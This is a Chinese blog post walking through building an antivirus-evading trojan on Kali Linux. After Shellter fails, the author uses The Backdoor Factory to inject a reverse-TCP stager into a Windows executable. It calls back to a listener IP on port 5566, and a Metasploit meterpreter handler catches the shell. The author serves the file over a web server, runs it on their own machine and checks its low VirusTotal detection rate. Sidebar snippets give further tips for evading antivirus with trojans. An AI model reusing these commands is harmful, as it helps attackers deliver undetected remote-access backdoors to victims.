kali制作木马并使用shellter免杀工具来实现更低的查杀率

于 2024-05-29 22:21:42 发布
阅读量756 收藏 8
点赞数 22
分类专栏: 渗透测试 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64498620/article/details/139307113
版权

Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。俗称为免杀。

官网地址:

Shellter | AV Evasion Artware

可以在官网下载window版本的

安装shellter

我使用的是kali进行安装

步骤:

apt-get update(事先更新)

apt install shellter     安装它

使用命令试试

告诉我需要安装wine32

dpkg --add-architecture i386 && apt update && apt -y install wine32       ————————安装wine32

执行完后好几分钟

开始执行,报错

网上找原因几次尝试,放弃了

于是换给免杀工具BDF

先安装docker部署

执行

apt -y install docker docker-compose    ----安装它

给虚拟环境部署为阿里

下载环境

docker pull secretsquirrel/the-backdoor-factory

查看一下是否下好

进入到试试看

docker run -it -v /root/ms:/tmp secretsquirrel/the-backdoor-factory bash

实现ms文件夹和docker的tmp同步

上传一个exe过去

开始使用BDf

部署时用IP地址时发现没IP地址了

把网卡重启一下

ifconfig eth0 down / ifconfig eth0 up

所有网卡重启:service network restart

制作木马

这就把geek文件做成木马了,监听5566

./backdoor.py -f /tmp/geek.exe -s iat_reverse_tcp_stager_threaded -H 192.168.173.35 -P 5566

做好了就用msf来接听实现访问shell

handler -H 192.168.173.35 -P 5566 -p windows/meterpreter/reverse_tcp

测试

现在就开始测试了

先把这个geek改名然后把他放到tmp文件中实现同步

再把它放到kail的/var/www/html下

开启web

直接拿物理机测试

访问IP地址

监听成功

然后就连接那些呐

确实是我的物理机

测试免杀率

在这里测试查杀率

VirusTotal

很低达的查杀率,还行

祝你好运q
关注
  • 22
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
shellter免杀
afei001
03-28 577
Shellter简介 Shellter是一个动态的shellcode注入工具,是第一个真正动态的PE infector创建的。“动态”二字就能够说明注入代码不可能存在于规则严格的地方,例如可执行文件的入口点等。它可以用于将shellcode注入本机Windows应用程序(目前仅适用于32位应用程序)。 目前,Shellter已经被正式收录到Kali Li...
一款用于PE文件绑定免杀工具: Shellter
xf555er的博客
01-26 1397
Shellter是一种动态二进制程序壳程序,它可以在现有的可执行文件中隐藏恶意软件。它使用动态链接库技术来实现恶意代码的注入,并且可以在不修改现有的可执行文件的情况下进行注入。这使得它非常难以检测,因为它不会改变文件的哈希值或数字签名Shellter的官方下载地址:https://www.shellterproject.com/当前Shellter最新免费版本是v7.2,最新收费版本是v_pro4.7。
远控免杀专题(7)-Shellter免杀(VT免杀7/69)
Ms08067安全实验室
03-04 661
本专题文章导航1、远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg2、远控免杀专题(2)-msfvenom隐...
kali免杀工具shellter
scholar_1的博客
08-06 3998
工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。Choose Operation Mode - Auto/Manual (A/M/H):A //A:自动模式自动注入后门,M:高级模式,H:帮助。(Y/N/H): Y //是否启用隐身模式 Y:启用 N:不启用 H:帮助。...
免杀测试】Kali之Metasploit几款工具免杀练习
最新发布
小司机的奥拓
12-25 1401
余磊不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。下面就尝试测试有关工具免杀效果,三款工具为,shellter,Veil, Avet01shellterShellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。它是生成一个dll文件再将其注入到任意一个文件中运行。
shellter-kali免杀工具
dongxieaitonglao的博客
03-17 297
/usr/share/windows-resources/shellter 这个文件夹 shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下
远控免杀专题7 ---shellter免杀
qq_41683305的博客
03-11 828
0x01 免杀能力一览表 几点说明: 1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。 2、为了好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(201...
免杀马学习(MSF Shellter)
红队是青春
02-05 228
免杀马学习 MSF Shellter
shellter免杀技术实战
热门推荐
自学编程_youkewang.top
03-25 1万+
Shellter是一个开源的免杀工具,利用动态Shellcode注入来实现免杀的效果,想了解多可以参考shellter官网:https://www.shellterproject.com/   实验环境:kali  shellter_v6.9  360  putty.exe   图1-1.   Part1:首先使用unzip解压shellter_v6.9到当前目录,然后进入shell
免杀工具--veil-evasion
11-21
免杀工具--veil-evasion】是一种在网络安全领域中常用的工具,主要用于对抗反病毒软件和入侵检测系统,使得恶意代码能够避开检测并执行。它通常被安全研究人员、渗透测试人员以及恶意攻击者使用,目的是为了提升...
最新免杀360全套,无提示上线,免杀世界杀毒网!!
12-18
最新免杀360全套
kali工具使用.pdf
09-14
kali工具使用.pdf
kali系统-工具-中文手册-html版
07-15
NMAP使用原始IP包以新颖的方式来确定哪些主机是在网络上可用,这些主机正在提供什么样的服务(应用程序的名称和版本),什么操作系统(和OS版本),它们都在运行,什么类型的分组过滤器/防火墙在使用中,和许多其他...
基于kali免杀木马技术研究.doc
09-07
基于kali免杀木马技术研究.doc
PE+KALI+U盘存储 三合一U盘制作工具共有6个
09-30
PE+KALI+U盘存储 三合一U盘制作工具共有6个,亲测可用。我自己制作了一个liveU盘,可以持久化存储。即插即用,超级方便。
Windows免杀木马+维持权限(shellter)
lingmessy的博客
04-08 1357
Windows免杀木马+维持权限 一.生成木马 工具shellter 环境:windows xp,Windows 7 操作: cmd 打开 shellter.exe 选择a,y 输入要注入木马的程序路径 选择y,l,1 输入返回的ip 最后回车就好了 二.开始监听 环境:kali 命令: msfconsole use exploit/multi/handler set...
shellter使用免杀测试
时乙的博客
10-14 3640
shellter是一个开源的老牌免杀工具,最初版在2014年发布,现在已经到Shellter Pro v4.0了。它利⽤动态Shellcode注⼊或者命令来实现免杀的效果。 shellter安装 shellterkali中是自带的,再接在命令行shellter就可以。 如果想在windows中安装的话就去官方下载源码包: https://www.shellterproject.com/download/ 下载后解压,直接在命令行就可以用,不需要安装。 shellter使用 以下所有的演示都是
kali木马免杀火绒
10-07
k木马免杀火绒是指在kali系统中使用火绒进行木马免杀的操作。火绒是一款知名的安全防护软件,可以帮助检测和阻止恶意软件的运行。然而,针对火绒的免杀技术是不断发展和变化的,所以具体的免杀方法可能会有所不同。在使用kali进行木马免杀时,您可以尝试以下方法: 1. 使用加壳工具:加壳工具可以将木马程序进行加密和混淆,从而绕过火绒的检测。您可以使用工具如shelter来对木马程序进行加壳操作,以增加木马免杀能力。 2. 修改木马特征:火绒通常会根据木马程序的特征进行识别和拦截,所以您可以修改木马的特征,使其不易被火绒检测到。例如,您可以修改木马的关键函数或变量名称,或者使用代码混淆技术来增加木马免杀能力。 3. 使用免杀工具kali系统中有一些专门用于木马免杀工具,您可以尝试使用这些工具来生成免杀木马程序。例如,您可以使用powerstager等工具来生成免杀木马,然后再进行火绒的测试。 总之,木马免杀是一个不断演进和变化的领域,没有绝对的免杀方法。在进行免杀操作时,建议您时刻关注最新的免杀技术和工具,并保持对火绒等防护软件的了解,以提高木马免杀能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值